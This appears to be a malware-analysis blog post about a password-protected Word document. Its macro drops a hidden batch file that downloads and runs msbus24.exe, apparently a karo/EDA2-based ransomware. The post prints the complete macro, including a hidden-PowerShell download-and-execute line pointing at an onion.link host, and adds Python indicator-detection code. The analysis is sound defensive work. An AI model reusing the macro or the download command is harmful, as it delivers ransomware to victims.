An analysis of a malicious Word document found using VirusTotal Intelligence!
Well, first things first: the damn document was password protected. Getting around that was a bit of a headache, but worth it. Anyway.
This is the malicious script which was hiding behind the password:
Private Sub Document_Open()
    Set fs = CreateObject("Scripting.FileSystemObject")
    ' Drop a batch file into %TEMP% and write it out line by line
    Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True)
    a.WriteLine ("@echo off")
    a.WriteLine ("set num=0")
    a.WriteLine (":checkexist")
    ' Retry up to 20 times until the payload exists in %TEMP%
    a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (")
    ' The download-and-run line is kept out of the macro body, in a form label's caption
    a.WriteLine (UserForm1.Label1.Caption)
    a.WriteLine ("TIMEOUT /t 20 /nobreak")
    a.WriteLine ("set /a num+=1")
    a.WriteLine ("GOTO checkexist )")
    a.WriteLine (":zipexist")
    a.Close
    ' Run the dropped batch file with no visible window
    Shell Environ("temp") + "\test.bat", vbHide
End Sub
UserForm1.Label1.Caption is the form label whose caption supplies the missing line (the original post showed its value as a screenshot). With that value substituted in, the 'completed script' looks as follows:
Private Sub Document_Open()
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True)
    a.WriteLine ("@echo off")
    a.WriteLine ("set num=0")
    a.WriteLine (":checkexist")
    a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (")
    ' Label1.Caption substituted in (the embedded double quotes are doubled, as VBA requires)
    a.WriteLine ("powershell.exe -w hidden ""(New-Object System.Net.WebClient).DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','%TEMP%\msbus24.exe')"" & %tmp%\msbus24.exe")
    a.WriteLine ("TIMEOUT /t 20 /nobreak")
    a.WriteLine ("set /a num+=1")
    a.WriteLine ("GOTO checkexist )")
    a.WriteLine (":zipexist")
    a.Close
    Shell Environ("temp") + "\test.bat", vbHide
End Sub
So the macro drops a batch file which, until msbus24.exe exists in %TEMP% (retrying up to 20 times, 20 seconds apart), uses a hidden PowerShell window to download the file from http://fbbkvm7ezghq4dx3.onion.link (a clearnet gateway to a Tor hidden service) and then executes the downloaded file.
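The substitution above can be done statically rather than by running the macro. The following is an added example (not code from the post): it rebuilds the dropped batch file from the macro's WriteLine calls, resolving Environ("temp") and the UserForm caption, and flags the behaviours an analyst would note. The %TEMP% path is an assumed sandbox value; the caption text and URL are the ones the post shows.

```python
import re
# Constructed sample: the Document_Open macro quoted in the post (reflowed) and the
# UserForm1.Label1.Caption value the post shows it pulling in; the URL is the page's own.
MACRO = r'''
Private Sub Document_Open()
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True)
    a.WriteLine ("@echo off")
    a.WriteLine ("set num=0")
    a.WriteLine (":checkexist")
    a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (")
    a.WriteLine (UserForm1.Label1.Caption)
    a.WriteLine ("TIMEOUT /t 20 /nobreak")
    a.WriteLine ("set /a num+=1")
    a.WriteLine ("GOTO checkexist )")
    a.WriteLine (":zipexist")
    a.Close
    Shell Environ("temp") + "\test.bat", vbHide
End Sub
'''
CAPTIONS = {"UserForm1.Label1.Caption": r'''powershell.exe -w hidden "(New-Object System.Net.WebClient)'''
            r'''.DownloadFile('http://fbbkvm7ezghq4dx3.onion.link/msbus24.exe','%TEMP%\msbus24.exe')" & %tmp%\msbus24.exe'''}
ENVIRON = {"temp": r"C:\Users\analyst\AppData\Local\Temp"}  # assumed sandbox value
# One token per VBA string literal, Environ() call or UserForm caption reference.
TOKEN = re.compile(r'"((?:[^"]|"")*)"|Environ\("(\w+)"\)|(UserForm\d+\.\w+\.Caption)')

def eval_expr(expr, environ=ENVIRON, captions=CAPTIONS):
    """Resolve a simple VBA concatenation expression into the string it produces."""
    parts = []
    for lit, env, cap in TOKEN.findall(expr):
        if env:
            parts.append(environ.get(env.lower(), "%" + env.upper() + "%"))
        elif cap:
            parts.append(captions.get(cap, "<" + cap + ">"))
        else:
            parts.append(lit.replace('""', '"'))  # VBA writes a literal " as ""
    return "".join(parts)

def rebuild_dropped_file(macro=MACRO):  # lines the macro writes via a.WriteLine, in order
    return [eval_expr(m.group(1)) for m in re.finditer(r"\.WriteLine\s*\((.*)\)\s*$", macro, re.M)]

INDICATORS = {  # behaviours worth flagging in the macro or in the dropped batch file
    "hidden_powershell": re.compile(r"powershell(\.exe)?\s+-w(indowstyle)?\s+hidden", re.I),
    "webclient_download": re.compile(r"\.DownloadFile\(", re.I),
    "tor2web_gateway": re.compile(r"\.onion\.\w+/", re.I),
    "hidden_shell_from_macro": re.compile(r"^\s*Shell\b.*vbHide", re.I | re.M),
}

def flag_indicators(text):
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))
```

Running flag_indicators over the macro plus the rebuilt batch text gives all four indicators for this sample; a benign batch file with only "@echo off" and a TIMEOUT yields none.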
Let’s dig into msbus24.exe. The file is a .NET binary, so it’s time to dig out dnSpy!
The file was obfuscated using SmartAssembly – which de4dot handles, so it is nice and easy to deobfuscate, thankfully!
$ de4dot msbus24.exe

de4dot v3.1.41592.3405 Copyright (C) 2011-2015 de4dot@gmail.com
Latest version and source code: https://github.com/0xd4d/de4dot

Detected SmartAssembly 6.8.0.121 (C:\msbus24.exe)
Cleaning C:\msbus24.exe
Renaming all obfuscated symbols
Saving C:\msbus24-cleaned.exe
The entry point is ns0.Class2.Main, so I’m going to start there.
An initial assumption is that this malware is still in early development, or that it is a ‘Malware-as-a-Service’ type of deal, because of little things like this hard-coded, generic mutex name:

    Mutex mutex = new Mutex(false, "MyUniqueMutexName");

The malware’s namespace is:

    namespace karo

so this is a strain of ransomware that has already been documented – it is based on EDA2 🙂
References
VirusTotal
- Original document: https://www.virustotal.com/en/file/efe972d0d2f73fc51813889b756f2660840a4ccf2c783688a31c2eb9e2052b3b/analysis/
- msbus24.exe: https://www.virustotal.com/file/48d3a79c6b83b6e45d1f217782ff35c9488d189392798b955cb3a946a650143f/analysis/
Tools
- dnSpy
- de4dot